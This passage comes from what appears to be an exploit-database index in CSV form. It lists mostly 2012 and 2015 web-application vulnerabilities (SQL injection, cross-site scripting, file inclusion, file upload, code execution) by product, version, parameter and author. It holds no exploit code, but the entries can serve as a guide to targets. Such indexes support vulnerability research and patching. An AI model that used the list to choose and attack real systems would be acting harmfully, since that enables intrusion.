Document Manager 2.5.3 - Blind SQL Injection",2015-03-31,Catsecurity,webapps,php, +36580,exploits/windows/webapps/36580.rb,"Palo Alto Traps Server 3.1.2.1546 - Persistent Cross-Site Scripting",2015-03-31,"Michael Hendrickx",webapps,windows, +36581,exploits/php/webapps/36581.txt,"Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities",2015-03-31,Mahendra,webapps,php,80 +36582,exploits/php/webapps/36582.txt,"OneOrZero AIMS - 'index.php' Cross-Site Scripting",2012-01-18,"High-Tech Bridge SA",webapps,php, +36583,exploits/php/webapps/36583.txt,"PostNuke pnAddressbook Module - 'id' SQL Injection",2012-01-19,"Robert Cooper",webapps,php, +36584,exploits/php/webapps/36584.txt,"Vastal EzineShop - 'view_mags.php' SQL Injection",2012-01-19,Lazmania61,webapps,php, +36585,exploits/asp/webapps/36585.txt,"Snitz Forums 2000 - 'TOPIC_ID' SQL Injection",2012-01-20,snup,webapps,asp, +36586,exploits/php/webapps/36586.txt,"Syneto Unified Threat Management 1.3.3/1.4.2 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-20,"Alexander Fuchs",webapps,php, +36588,exploits/asp/webapps/36588.txt,"Acidcat ASP CMS 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-21,"Avram Marius",webapps,asp, +36589,exploits/php/webapps/36589.txt,"Joomla! Component com_br - 'Controller' Local File Inclusion",2012-01-23,the_cyber_nuxbie,webapps,php, +36590,exploits/php/webapps/36590.txt,"Tribiq CMS - 'index.php' SQL Injection",2012-01-21,"Skote Vahshat",webapps,php, +36591,exploits/php/webapps/36591.txt,"Joomla! Component Full - 'id' SQL Injection",2012-01-21,the_cyber_nuxbie,webapps,php, +36592,exploits/php/webapps/36592.txt,"Joomla! Component Vik Real Estate 1.0 - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,webapps,php, +36593,exploits/php/webapps/36593.txt,"Joomla! Component com_xball - 'team_id' SQL Injection",2012-01-23,CoBRa_21,webapps,php, +36594,exploits/php/webapps/36594.txt,"Joomla! Component com_boss - 'Controller' Local File Inclusion",2012-01-21,the_cyber_nuxbie,webapps,php, +36595,exploits/php/webapps/36595.txt,"Joomla! Component com_car - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,webapps,php, +36596,exploits/php/webapps/36596.txt,"Joomla! Component com_some - 'Controller' Local File Inclusion",2012-01-21,the_cyber_nuxbie,webapps,php, +36597,exploits/php/webapps/36597.txt,"Joomla! Component com_bulkenquery - 'Controller' Local File Inclusion",2012-01-21,the_cyber_nuxbie,webapps,php, +36598,exploits/php/webapps/36598.txt,"Joomla! Component com_kp - 'Controller' Local File Inclusion",2012-01-21,the_cyber_nuxbie,webapps,php, +36599,exploits/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload",2012-01-21,HELLBOY,webapps,asp, +36600,exploits/php/webapps/36600.txt,"WordPress Plugin Business Intelligence - SQL Injection (Metasploit)",2015-04-02,"Jagriti Sahu",webapps,php,80 +36601,exploits/php/webapps/36601.txt,"Joomla! Component com_rand - SQL Injection",2015-04-02,"Jagriti Sahu",webapps,php,80 +36620,exploits/php/webapps/36620.txt,"WordPress Plugin YouSayToo auto-publishing 1.0 - 'submit' Cross-Site Scripting",2012-01-24,"H4ckCity Security Team",webapps,php, +36609,exploits/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",webapps,multiple,80 +36610,exploits/php/webapps/36610.txt,"WordPress Plugin Video Gallery 2.8 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-04-02,Divya,webapps,php,80 +36611,exploits/php/webapps/36611.txt,"Multiple WordPress UpThemes Themes - Arbitrary File Upload",2015-04-02,Divya,webapps,php,80 +36612,exploits/php/webapps/36612.txt,"WordPress Plugin WP Easy Slideshow 1.0.3 - Multiple Vulnerabilities",2015-04-02,Divya,webapps,php,80 +36613,exploits/php/webapps/36613.txt,"WordPress Plugin Simple Ads Manager - Multiple SQL Injections",2015-04-02,"ITAS Team",webapps,php,80 +36614,exploits/php/webapps/36614.txt,"WordPress Plugin Simple Ads Manager 2.5.94 - Arbitrary File Upload",2015-04-02,"ITAS Team",webapps,php,80 +36615,exploits/php/webapps/36615.txt,"WordPress Plugin Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",webapps,php,80 +36616,exploits/php/webapps/36616.txt,"phpSFP Schedule Facebook Posts 1.5.6 - SQL Injection",2015-04-02,@u0x,webapps,php,80 +36617,exploits/php/webapps/36617.txt,"WordPress Plugin VideoWhisper Video Presentation 3.31.17 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",webapps,php,80 +36618,exploits/php/webapps/36618.txt,"WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",webapps,php,80 +36619,exploits/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",webapps,linux, +36621,exploits/php/webapps/36621.txt,"glFusion 1.x - SQL Injection",2012-01-24,KedAns-Dz,webapps,php, +36623,exploits/php/webapps/36623.txt,"Ultimate Locator - 'radius' SQL Injection",2012-01-24,"Robert Cooper",webapps,php, +36624,exploits/php/webapps/36624.txt,"Joomla! Component JE Story Submit - 'index.php' Arbitrary File Upload",2012-01-24,"Robert Cooper",webapps,php, +36625,exploits/php/webapps/36625.txt,"OSClass 2.3.3 - 'index.php?sCategory' SQL Injection",2012-01-25,"High-Tech Bridge SA",webapps,php, +36626,exploits/php/webapps/36626.txt,"OSClass 2.3.3 - 'index.php?getParam()' Multiple Cross-Site Scripting Vulnerabilities",2012-01-25,"High-Tech Bridge SA",webapps,php, +36627,exploits/php/webapps/36627.txt,"DClassifieds 0.1 final - Cross-Site Request Forgery",2012-01-25,"High-Tech Bridge SA",webapps,php, +36628,exploits/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Inclusion",2012-01-25,PacketiK,webapps,php, +36629,exploits/php/webapps/36629.txt,"Joomla! Component com_motor - 'cid' SQL Injection",2012-01-26,the_cyber_nuxbie,webapps,php, +36630,exploits/php/webapps/36630.txt,"Joomla! Component com_products - Multiple SQL Injections",2012-01-26,the_cyber_nuxbie,webapps,php, +36631,exploits/php/webapps/36631.txt,"WordPress Plugin Slideshow Gallery 1.1.x - 'border' Cross-Site Scripting",2012-01-26,"Bret Hawk",webapps,php, +36632,exploits/php/webapps/36632.txt,"xClick Cart 1.0.x - 'shopping_url' Cross-Site Scripting",2012-01-26,sonyy,webapps,php, +36634,exploits/php/webapps/36634.txt,"Joomla! Component com_visa - Local File Inclusion / SQL Injection",2012-01-28,the_cyber_nuxbie,webapps,php, +36635,exploits/php/webapps/36635.txt,"Joomla! Component com_firmy - 'Id' SQL Injection",2012-01-30,the_cyber_nuxbie,webapps,php, +36638,exploits/php/webapps/36638.txt,"Joomla! Component com_crhotels - 'catid' SQL Injection",2012-01-31,the_cyber_nuxbie,webapps,php, +36639,exploits/php/webapps/36639.txt,"Joomla! Component com_propertylab - 'id' SQL Injection",2012-01-30,the_cyber_nuxbie,webapps,php, +36640,exploits/php/webapps/36640.txt,"WordPress Plugin Work The Flow File Upload 2.5.2 - Arbitrary File Upload",2015-04-05,"Claudio Viviani",webapps,php, +36641,exploits/php/webapps/36641.txt,"u-Auctions - Multiple Vulnerabilities",2015-04-05,*Don*,webapps,php, +36642,exploits/php/webapps/36642.txt,"Joomla! Component com_bbs - Multiple SQL Injections",2012-01-30,the_cyber_nuxbie,webapps,php, +36643,exploits/php/webapps/36643.txt,"4Images 1.7.10 - '/admin/categories.php?cat_parent_id' SQL Injection",2012-01-31,RandomStorm,webapps,php, +36644,exploits/php/webapps/36644.txt,"4Images 1.7.10 - '/admin/categories.php?cat_parent_id' Cross-Site Scripting",2012-01-31,RandomStorm,webapps,php, +36645,exploits/php/webapps/36645.txt,"4Images 1.7.10 - '/admin/index.php?redirect' Arbitrary Site Redirect",2012-01-31,RandomStorm,webapps,php, +36646,exploits/php/webapps/36646.txt,"Joomla! Component com_cmotour - 'id' SQL Injection",2012-01-28,the_cyber_nuxbie,webapps,php, +36647,exploits/php/webapps/36647.txt,"Lead Capture - 'login.php' Script Cross-Site Scripting",2012-01-21,HashoR,webapps,php, +36648,exploits/php/webapps/36648.txt,"OpenEMR 4.1 - '/Interface/patient_file/encounter/trend_form.php?formname' Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",webapps,php, +36649,exploits/php/webapps/36649.txt,"OpenEMR 4.1 - '/Interface/patient_file/encounter/load_form.php?formname' Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",webapps,php, +36650,exploits/php/webapps/36650.txt,"OpenEMR 4.1 - '/contrib/acog/print_form.php?formname' Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",webapps,php, +36651,exploits/php/webapps/36651.txt,"OpenEMR 4.1 - '/Interface/fax/fax_dispatch.php?File' 'exec()' Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",webapps,php, +36654,exploits/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Cross-Site Scripting",2012-02-01,andsarmiento,webapps,php, +36655,exploits/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Cross-Site Scripting",2012-02-01,andsarmiento,webapps,php, +36656,exploits/php/webapps/36656.txt,"GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-02,sonyy,webapps,php, +36657,exploits/php/webapps/36657.txt,"Joomla! Component com_bnf - 'seccion_id' SQL Injection",2012-02-02,"Daniel Godoy",webapps,php, +36658,exploits/php/webapps/36658.txt,"iknSupport 'search' Module - Cross-Site Scripting",2012-02-02,"Red Security TEAM",webapps,php, +36659,exploits/php/webapps/36659.txt,"Joomla! Component Currency Converter 1.0.0 - 'from' Cross-Site Scripting",2012-02-02,"BHG Security Center",webapps,php, +36660,exploits/php/webapps/36660.txt,"project-open 3.4.x - 'account-closed.tcl' Cross-Site Scripting",2012-02-03,"Michail Poultsakis",webapps,php, +36661,exploits/php/webapps/36661.txt,"PHP-Fusion 7.2.4 - 'weblink_id' SQL Injection",2012-02-03,Am!r,webapps,php, +36664,exploits/php/webapps/36664.txt,"Vespa 0.8.6 - 'getid3.php' Local File Inclusion",2012-02-06,T0x!c,webapps,php, +36665,exploits/php/webapps/36665.txt,"Simple Groupware 0.742 - 'export' Cross-Site Scripting",2012-02-07,"Infoserve Security Team",webapps,php, +36666,exploits/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - 'Operation' Cross-Site Scripting",2012-02-07,LiquidWorm,webapps,java, +36667,exploits/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - 'domainName' Cross-Site Scripting",2012-02-07,LiquidWorm,webapps,java, +36668,exploits/php/webapps/36668.txt,"eFront 3.6.10 - 'administrator.php' Cross-Site Scripting",2012-02-07,"Chokri B.A",webapps,php, +36671,exploits/php/webapps/36671.txt,"WordPress Plugin All In One WP Security & Firewall 3.9.0 - SQL Injection",2015-04-08,"Claudio Viviani",webapps,php,80 +36674,exploits/php/webapps/36674.txt,"WordPress Plugin Shareaholic 7.6.0.3 - Cross-Site Scripting",2015-04-08,"Kacper Szurek",webapps,php,80 +36675,exploits/php/webapps/36675.txt,"Balero CMS 0.7.2 - Multiple Blind SQL Injections",2015-04-08,LiquidWorm,webapps,php,80 +36676,exploits/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,webapps,php,80 +36677,exploits/php/webapps/36677.txt,"WordPress Plugin Traffic Analyzer 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",webapps,php,80 +36678,exploits/jsp/webapps/36678.txt,"ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",webapps,jsp, +36683,exploits/php/webapps/36683.txt,"Dolibarr CMS 3.x - '/adherents/fiche.php' SQL Injection",2012-02-10,"Benjamin Kunz Mejri",webapps,php, +36684,exploits/java/webapps/36684.txt,"LxCenter Kloxo 6.1.10 - Multiple HTML Injection Vulnerabilities",2012-02-10,anonymous,webapps,java, +36685,exploits/php/webapps/36685.txt,"CubeCart 3.0.20 - Multiple Script 'redir' Arbitrary Site Redirects",2012-02-10,"Aung Khant",webapps,php, +36686,exploits/php/webapps/36686.txt,"CubeCart 3.0.20 - '/admin/login.php?goto' Arbitrary Site Redirect",2012-02-10,"Aung Khant",webapps,php, +36687,exploits/php/webapps/36687.txt,"CubeCart 3.0.20 - 'switch.php?r' Arbitrary Site Redirect",2012-02-10,"Aung Khant",webapps,php, +36688,exploits/php/webapps/36688.html,"Zen Cart 1.3.9h - '/path_to_admin/product.php' Cross-Site Request Forgery",2012-02-10,DisK0nn3cT,webapps,php, +36689,exploits/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,webapps,linux, +36691,exploits/php/webapps/36691.txt,"WordPress Plugin Windows Desktop and iPhone Photo Uploader - Arbitrary File Upload",2015-04-09,"Manish Tanwar",webapps,php,80 +36693,exploits/php/webapps/36693.txt,"RabbitWiki - 'title' Cross-Site Scripting",2012-02-10,sonyy,webapps,php, +36694,exploits/php/webapps/36694.txt,"eFront Community++ 3.6.10 - SQL Injection / Multiple HTML Injection Vulnerabilities",2012-02-12,"Benjamin Kunz Mejri",webapps,php, +36695,exploits/php/webapps/36695.txt,"Zimbra - 'view' Cross-Site Scripting",2012-02-13,sonyy,webapps,php, +36696,exploits/php/webapps/36696.txt,"Nova CMS - '/administrator/modules/moduleslist.php?id' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36697,exploits/php/webapps/36697.txt,"Nova CMS - '/optimizer/index.php?fileType' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36698,exploits/php/webapps/36698.txt,"Nova CMS - '/includes/function/gets.php?Filename' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36699,exploits/php/webapps/36699.txt,"Nova CMS - '/includes/function/usertpl.php?conf[blockfile]' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36702,exploits/php/webapps/36702.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_db_setup.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36703,exploits/php/webapps/36703.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_graph_common.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36704,exploits/php/webapps/36704.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_graph_display.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36705,exploits/php/webapps/36705.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_graph_form.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36706,exploits/php/webapps/36706.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_graph_main.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36707,exploits/php/webapps/36707.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_local_rules.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36708,exploits/php/webapps/36708.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_logout.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36709,exploits/php/webapps/36709.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_main.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36710,exploits/php/webapps/36710.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_maintenance.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36711,exploits/php/webapps/36711.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_payload.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36712,exploits/php/webapps/36712.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/help/base_setup_help.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36713,exploits/php/webapps/36713.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_action.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36714,exploits/php/webapps/36714.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_cache.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36715,exploits/php/webapps/36715.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_db.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36716,exploits/php/webapps/36716.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_include.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36717,exploits/php/webapps/36717.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_output_html.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36718,exploits/php/webapps/36718.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_output_query.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36719,exploits/php/webapps/36719.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_state_criteria.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36720,exploits/php/webapps/36720.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_state_query.inc.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36721,exploits/php/webapps/36721.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/setup/base_conf_contents.php' Multiple Remote File Inclusions",2012-02-11,indoushka,webapps,php, +36722,exploits/php/webapps/36722.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/includes/base_state_common.inc.php?GLOBALS[user_session_path]' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36723,exploits/php/webapps/36723.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/setup/setup2.php?ado_inc_PHP' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36724,exploits/php/webapps/36724.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_ag_main.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36725,exploits/php/webapps/36725.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_qry_alert.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36726,exploits/php/webapps/36726.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_qry_common.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36727,exploits/php/webapps/36727.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_alerts.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36728,exploits/php/webapps/36728.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_class.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36729,exploits/php/webapps/36729.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_common.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36730,exploits/php/webapps/36730.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_ipaddr.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36731,exploits/php/webapps/36731.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_iplink.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36732,exploits/php/webapps/36732.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_ports.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36733,exploits/php/webapps/36733.txt,"WordPress Plugin WP Mobile Edition 2.7 - Remote File Disclosure",2015-04-13,"Khwanchai Kaewyos",webapps,php, +36735,exploits/php/webapps/36735.txt,"WordPress Plugin Duplicator 0.5.14 - SQL Injection / Cross-Site Request Forgery",2015-04-13,"Claudio Viviani",webapps,php, +36736,exploits/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",webapps,php, +36738,exploits/php/webapps/36738.txt,"WordPress Plugin N-Media Website Contact Form with File Upload 1.3.4 - Arbitrary File Upload (1)",2015-04-13,"Claudio Viviani",webapps,php, +36761,exploits/php/webapps/36761.txt,"WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery / Arbitrary File Deletion",2015-04-14,LiquidWorm,webapps,php,80 +36752,exploits/php/webapps/36752.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_sensor.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36753,exploits/php/webapps/36753.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_time.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36754,exploits/php/webapps/36754.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_stat_uaddr.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36751,exploits/php/webapps/36751.txt,"WordPress Plugin Video Gallery 2.8 - SQL Injection",2015-04-14,"Claudio Viviani",webapps,php,80 +36755,exploits/php/webapps/36755.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_user.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36757,exploits/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'index.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36758,exploits/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/admin/base_useradmin.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36759,exploits/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - '/admin/index.php?base_path' Remote File Inclusion",2012-02-11,indoushka,webapps,php, +36760,exploits/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'base_ag_main.php' Crafted Arbitrary File Upload / Arbitrary Code Execution",2012-02-11,indoushka,webapps,php, +36762,exploits/php/webapps/36762.txt,"WordPress Plugin MiwoFTP 1.0.5 - Multiple Cross-Site Request Forgery / Cross-Site Scripting Vulnerabilities",2015-04-14,LiquidWorm,webapps,php,80 +36763,exploits/php/webapps/36763.txt,"WordPress Plugin MiwoFTP 1.0.5 - Cross-Site Request Forgery / Arbitrary File Creation / Remote Code Execution",2015-04-14,LiquidWorm,webapps,php,80 +36764,exploits/php/webapps/36764.txt,"SMW+ 1.5.6 - 'target' HTML Injection",2012-02-13,sonyy,webapps,php, +36765,exploits/php/webapps/36765.txt,"Powie pFile 1.02 - '/pfile/kommentar.php?filecat' Cross-Site Scripting",2012-02-13,indoushka,webapps,php, +36766,exploits/php/webapps/36766.txt,"Powie pFile 1.02 - '/pfile/file.php?id' SQL Injection",2012-02-13,indoushka,webapps,php, +36768,exploits/php/webapps/36768.txt,"ProWiki - 'id' Cross-Site Scripting",2012-02-10,sonyy,webapps,php, +36769,exploits/php/webapps/36769.txt,"STHS v2 Web Portal - 'prospects.php?team' SQL Injection",2012-02-13,"Liyan Oz",webapps,php, +36770,exploits/php/webapps/36770.txt,"STHS v2 Web Portal - 'prospect.php?team' SQL Injection",2012-02-13,"Liyan Oz",webapps,php, +36771,exploits/php/webapps/36771.txt,"STHS v2 Web Portal - 'team.php?team' SQL Injection",2012-02-13,"Liyan Oz",webapps,php, +36772,exploits/cgi/webapps/36772.txt,"EditWrxLite CMS - 'wrx.cgi' Remote Command Execution",2012-02-13,chippy1337,webapps,cgi, +36774,exploits/php/webapps/36774.txt,"WordPress Plugin MiwoFTP 1.0.5 - Arbitrary File Download (1)",2015-04-15,"Necmettin COSKUN",webapps,php, +36807,exploits/php/webapps/36807.txt,"GoAutoDial 3.3-1406088000 - Multiple Vulnerabilities",2015-04-21,"Chris McCurley",webapps,php,80 +36777,exploits/php/webapps/36777.txt,"WordPress Plugin Ajax Store Locator 1.2 - SQL Injection",2015-04-16,"Claudio Viviani",webapps,php,80 +36784,exploits/php/webapps/36784.txt,"11in1 CMS 1.2.1 - 'index.php?class' Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",webapps,php, +36785,exploits/php/webapps/36785.txt,"11in1 CMS 1.2.1 - '/admin/index.php?class' Traversal Local File Inclusion",2012-02-15,"High-Tech Bridge SA",webapps,php, +36786,exploits/php/webapps/36786.txt,"11in1 CMS 1.2.1 - Cross-Site Request Forgery (Admin Password)",2012-02-15,"High-Tech Bridge SA",webapps,php, +36787,exploits/php/webapps/36787.txt,"LEPTON 1.1.3 - Cross-Site Scripting",2012-02-15,"High-Tech Bridge SA",webapps,php, +36790,exploits/php/webapps/36790.txt,"Tube Ace - 'q' Cross-Site Scripting",2012-02-16,"Daniel Godoy",webapps,php, +36791,exploits/php/webapps/36791.txt,"CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injections",2012-02-16,tempe_mendoan,webapps,php, +36792,exploits/php/webapps/36792.txt,"Pandora FMS 4.0.1 - 'sec2' Local File Inclusion",2012-02-17,"Ucha Gobejishvili",webapps,php, +36793,exploits/php/webapps/36793.txt,"ButorWiki 3.0 - 'service' Cross-Site Scripting",2012-02-17,sonyy,webapps,php, +36795,exploits/ios/webapps/36795.txt,"Wifi Drive Pro 1.2 iOS - Local File Inclusion",2015-04-21,Vulnerability-Lab,webapps,ios, +36796,exploits/ios/webapps/36796.txt,"Photo Manager Pro 4.4.0 iOS - Local File Inclusion",2015-04-21,Vulnerability-Lab,webapps,ios, +36797,exploits/ios/webapps/36797.txt,"Mobile Drive HD 1.8 - Local File Inclusion",2015-04-21,Vulnerability-Lab,webapps,ios, +36798,exploits/ios/webapps/36798.txt,"Photo Manager Pro 4.4.0 iOS - Code Execution",2015-04-21,Vulnerability-Lab,webapps,ios, +36800,exploits/php/webapps/36800.txt,"WordPress Plugin NEX-Forms < 3.0 - SQL Injection",2015-04-21,"Claudio Viviani",webapps,php, +36801,exploits/php/webapps/36801.txt,"WordPress Plugin MiwoFTP 1.0.5 - Arbitrary File Download (2)",2015-04-21,"dadou dz",webapps,php, +36802,exploits/php/webapps/36802.txt,"WordPress Plugin Tune Library 1.5.4 - SQL Injection",2015-04-21,"Hannes Trunde",webapps,php, +36804,exploits/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure",2015-04-21,"KnocKout inj3ct0r",webapps,php, +36805,exploits/php/webapps/36805.txt,"WordPress Plugin Community Events 1.3.5 - SQL Injection",2015-04-21,"Hannes Trunde",webapps,php, +36815,exploits/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,webapps,cfm,80 +36848,exploits/php/webapps/36848.txt,"Tiki Wiki CMS Groupware - 'url' Open Redirection",2012-02-18,sonyy,webapps,php, +36849,exploits/php/webapps/36849.txt,"VOXTRONIC Voxlog Professional 3.7.x - 'get.php?v' Arbitrary File Access",2012-02-20,"J. Greil",webapps,php, +36850,exploits/php/webapps/36850.txt,"VOXTRONIC Voxlog Professional 3.7.x - 'userlogdetail.php?idclient' SQL Injection",2012-02-20,"J. Greil",webapps,php, +36851,exploits/php/webapps/36851.txt,"F*EX 20100208/20111129-2 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-20,muuratsalo,webapps,php, +36852,exploits/php/webapps/36852.txt,"TestLink - Multiple SQL Injections",2012-02-20,"Juan M. Natal",webapps,php, +36818,exploits/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload",2015-04-22,"CWH Underground",webapps,php,80 +36821,exploits/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution",2015-04-23,"TUNISIAN CYBER",webapps,php, +36823,exploits/php/webapps/36823.txt,"WordPress Plugin Ultimate Product Catalogue - Unauthenticated SQL Injection (1)",2015-04-23,"Felipe Molina",webapps,php, +36824,exploits/php/webapps/36824.txt,"WordPress Plugin Ultimate Product Catalogue - Unauthenticated SQL Injection (2)",2015-04-23,"Felipe Molina",webapps,php, +36830,exploits/php/webapps/36830.txt,"Impulsio CMS - 'id' SQL Injection",2012-02-16,sonyy,webapps,php, +36834,exploits/php/webapps/36834.txt,"Joomla! Component com_x-shop - 'idd' SQL Injection",2012-02-18,KedAns-Dz,webapps,php, +36835,exploits/php/webapps/36835.txt,"Joomla! Component com_xcomp - Local File Inclusion",2012-02-18,KedAns-Dz,webapps,php, +36844,exploits/php/webapps/36844.txt,"WordPress 4.2 - Persistent Cross-Site Scripting",2015-04-27,klikki,webapps,php, +36842,exploits/php/webapps/36842.pl,"OTRS < 3.1.x / < 3.2.x / < 3.3.x - Persistent Cross-Site Scripting",2015-04-27,"Adam Ziaja",webapps,php, +36994,exploits/cgi/webapps/36994.txt,"WebGlimpse 2.18.7 - 'DOC' Directory Traversal",2009-04-17,MustLive,webapps,cgi, +36853,exploits/php/webapps/36853.txt,"Dolphin 7.0.x - 'viewFriends.php' Multiple Cross-Site Scripting Vulnerabilities",2012-02-21,"Aung Khant",webapps,php, +36854,exploits/php/webapps/36854.txt,"Dolphin 7.0.x - 'explanation.php?explain' Cross-Site Scripting",2012-02-21,"Aung Khant",webapps,php, +36856,exploits/php/webapps/36856.txt,"Joomla! Component com_xvs - 'Controller' Local File Inclusion",2012-02-18,KedAns-Dz,webapps,php, +36860,exploits/php/webapps/36860.txt,"WordPress Plugin TheCartPress 1.3.9 - Multiple 